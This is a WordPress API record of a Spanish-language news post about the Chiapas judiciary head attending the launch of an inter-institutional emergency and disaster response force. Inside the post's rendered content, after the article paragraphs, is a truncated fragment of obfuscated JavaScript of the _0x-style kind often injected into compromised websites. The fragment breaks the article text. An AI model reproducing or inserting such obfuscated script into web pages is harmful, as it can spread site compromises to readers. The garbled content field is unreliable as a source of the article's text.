{"id":20665,"date":"2025-03-01T05:26:23","date_gmt":"2025-03-01T05:26:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20665"},"modified":"2025-03-01T05:26:24","modified_gmt":"2025-03-01T05:26:24","slug":"instituciones-unidas-en-beneficio-de-las-y-los-chiapanecos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20665","title":{"rendered":"Instituciones unidas en beneficio de las y los chiapanecos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"20666\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030-1024x681.jpg\" alt=\"\" class=\"wp-image-20666\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250228-WA0030.jpg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>28 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Desde la VII Regi\u00f3n Militar, el magistrado presidente del Poder Judicial de Chiapas, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al gobernador del estado, Eduardo Ram\u00edrez Aguilar, a la presentaci\u00f3n de la Fuerza Interinstitucional para Casos de Emergencia o Desastres.<\/p>\n\n\n\n<p>En este contexto, Moreno Guill\u00e9n celebr\u00f3 que las instituciones de seguridad trabajen en conjunto en beneficio de las y los chiapanecos, y se tenga una reacci\u00f3n inmediata y eficiente en casos de desastres y contingencias.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 28 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Desde la VII Regi\u00f3n Militar, el magistrado presidente del Poder Judicial de Chiapas, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al gobernador del estado, Eduardo Ram\u00edrez Aguilar, a la presentaci\u00f3n de la Fuerza Interinstitucional para Casos de Emergencia o Desastres. En este contexto, Moreno Guill\u00e9n celebr\u00f3 que las instituciones &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20666,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20665","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20665","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20665"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20665\/revisions"}],"predecessor-version":[{"id":20667,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20665\/revisions\/20667"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20666"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}